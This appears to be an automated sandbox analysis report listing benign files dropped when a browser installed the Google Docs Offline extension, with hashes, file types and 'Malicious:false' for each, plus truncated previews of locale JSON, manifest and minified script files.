Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\th\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1674
Entropy (8bit):4.343724179386811
Encrypted:false
SSDEEP:
MD5:64077E3D186E585A8BEA86FF415AA19D
SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\tr\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1063
Entropy (8bit):4.853399816115876
Encrypted:false
SSDEEP:
MD5:76B59AAACC7B469792694CF3855D3F4C
SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\uk\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1333
Entropy (8bit):4.686760246306605
Encrypted:false
SSDEEP:
MD5:970963C25C2CEF16BB6F60952E103105
SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\ur\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1263
Entropy (8bit):4.861856182762435
Encrypted:false
SSDEEP:
MD5:8B4DF6A9281333341C939C244DDB7648
SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\vi\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1074
Entropy (8bit):5.062722522759407
Encrypted:false
SSDEEP:
MD5:773A3B9E708D052D6CBAA6D55C8A5438
SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\zh_CN\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):879
Entropy (8bit):5.7905809868505544
Encrypted:false
SSDEEP:
MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\zh_HK\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1205
Entropy (8bit):4.50367724745418
Encrypted:false
SSDEEP:
MD5:524E1B2A370D0E71342D05DDE3D3E774
SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\zh_TW\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):843
Entropy (8bit):5.76581227215314
Encrypted:false
SSDEEP:
MD5:0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\zu\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):912
Entropy (8bit):4.65963951143349
Encrypted:false
SSDEEP:
MD5:71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_metadata\verified_contents.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):11280
Entropy (8bit):5.75072251686336
Encrypted:false
SSDEEP:
MD5:CB96BFFC022867F3B3DD525D40CF5429
SHA1:56AB05B451BE53096DE1DB128D5E7461598FE212
SHA-256:A168E1A08F9A621F5491B078FAA7E29FE968AF03721163CC01EA7A25965BEB26
SHA-512:5506FF34D5015993A306D5C3C988211CCAD204B00881927EEA9F2CF21E6C5ACAC7802E3F878B9BC1F2FE60388784E69F1330B6F29F45A97213A98BDF7607F9FC
Malicious:false
Reputation:unknown
Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\dasherSettingSchema.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):854
Entropy (8bit):4.284628987131403
Encrypted:false
SSDEEP:
MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:false
Reputation:unknown
Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\manifest.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2525
Entropy (8bit):5.418318285401414
Encrypted:false
SSDEEP:
MD5:3B4509B8820E8EFE03C9BEF60A21D60E
SHA1:612AB23441238FB77D7458535F7423530320380E
SHA-256:A9A07E2FFE2058AE56E6ECA4FE82940A1A18A5E786FDE1E7F01E559649FBA338
SHA-512:5A0B799E03328BF5ACDC371603757571C834DE16285CC6B9390F49D60AA94B3F099C4FF10CF3918F5C85348BD3808F0684A09ACFA115E66ADAF4ABF90D57CB66
Malicious:false
Reputation:unknown
Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\offscreendocument.html

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:HTML document, ASCII text
Category:dropped
Size (bytes):97
Entropy (8bit):4.862433271815736
Encrypted:false
SSDEEP:
MD5:B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\offscreendocument_main.js

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (4369)
Category:dropped
Size (bytes):95567
Entropy (8bit):5.4016395763198135
Encrypted:false
SSDEEP:
MD5:09AF2D8CFA8BF1078101DA78D09C4174
SHA1:F2369551E2CDD86258062BEB0729EE4D93FCA050
SHA-256:39D113C44D45AE3609B9509ED099680CC5FCEF182FD9745B303A76E164D8BCEC
SHA-512:F791434B053FA2A5B731C60F22A4579F19FE741134EF0146E8BAC7DECAC78DE65915B3188093DBBE00F389A7F15B80172053FABB64E636DD4A945DBE3C2CF2E6
Malicious:false
Reputation:unknown
Preview:'use strict';function aa(){return function(){}}function l(a){return function(){return this[a]}}var n;function ba(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=da(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\page_embed_script.js

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):291
Entropy (8bit):4.65176400421739
Encrypted:false
SSDEEP:
MD5:3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:false
Reputation:unknown
Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\service_worker_bin_prod.js

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (4369)
Category:dropped
Size (bytes):103988
Entropy (8bit):5.389407461078688
Encrypted:false
SSDEEP:
MD5:EA946F110850F17E637B15CF22B82837
SHA1:8D27C963E76E3D2F5B8634EE66706F95F000FCAF
SHA-256:029DFE87536E8907A612900B26EEAA72C63EDF28458A7227B295AE6D4E2BD94C
SHA-512:5E8E61E648740FEF2E89A035A4349B2E4E5E4E88150EE1BDA9D4AD8D75827DC67C1C95A2CA41DF5B89DE8F575714E1A4D23BDE2DC3CF21D55DB3A39907B8F820
Malicious:false
Reputation:unknown
Preview:'use strict';function k(){return function(){}}function n(a){return function(){return this[a]}}var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=da(this);function t(a,b){if(b)a:{var c=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,g

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jun 26 04:51:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:dropped
Size (bytes):2673
Entropy (8bit):3.9781915948551116
Encrypted:false
SSDEEP:
MD5:A36304C49334C767B2264DA92A43E45E
SHA1:C103A5447FCAC38FF9FA2D966F6D362D789549AB
SHA-256:30F93ACB0E73163D256BB064040F49880A7315AF0B8BEEF90C698B73F8495633
SHA-512:63057FF3A20C52F30C3917F94A0A577F1289FDCB329D45EEF1672484A8B2CEB0D35823C302FA90DA0C26CF52EE5FA6DF5F9AD88443D518016A1D13BBD393501F
Malicious:false
Reputation:unknown
Preview:L..................F.@.. ...$+.,......y....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xo.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xy............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jun 26 04:51:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:dropped
Size (bytes):2675
Entropy (8bit):3.9935476820469944
Encrypted:false
SSDEEP:
MD5:411A3F0D5FA44DFA8A9AFB45588A38F2
SHA1:A3FE383B0DCA7F03D600D51FB87662D865BE9451
SHA-256:5BA621213B2161F359502A737D670C66C9B0D2654DE66B6171261ED7F0520BF7
SHA-512:BE1D57275DA40E11E32E17D86B93A6AF86E2FFCA6A45EC6E5A56300C8C15A3F69172C1F89F24E6EFE35113AA0732E554382F2E75BA70767F1809081CFB94E11B
Malicious:false
Reputation:unknown
Preview:L..................F.@.. ...$+.,.....o....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Xo.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xw.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xw.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xw............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xy............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:dropped
Size (bytes):2689
Entropy (8bit):4.004181687447603
Encrypted:false
SSDEEP:
MD5:FBEC2990599BA889303EF30221384413
SHA1:E12BBE4808625B31C4F78D87AE29B8D5F85E9422
SHA-256:3DB124FF746BFE18A72A0C63241B95E1BBE37CAD02932257DB5F28B31D32DC39
SHA-512:8A9636F1743525AD358E1BF22E4C912F655F193BD0515F539136B482131811EE2B4F84168CCB8FF1A1A6D9848A11B4595ACC9942D5B8FC63827F8BA34DFD4FAE
Malicious:false
Reputation:unknown
